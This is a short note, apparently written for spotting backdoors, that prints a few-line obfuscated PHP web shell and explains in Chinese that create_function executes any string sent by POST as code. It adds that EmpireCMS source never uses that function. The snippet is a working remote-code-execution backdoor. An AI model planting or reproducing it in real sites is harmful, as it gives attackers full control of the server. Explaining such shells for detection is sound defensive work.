<?php function fun2(){ $b=$_POST; return @($b[a]); } @extract(array(b=>create_function(NULL,fun2()))); @extract(array(c=>$b())); ?>
这段代码,通过create_function函数,使得post上传的字符串,被当作代码来执行。
在帝国cms的源代码中,没有使用这个函数。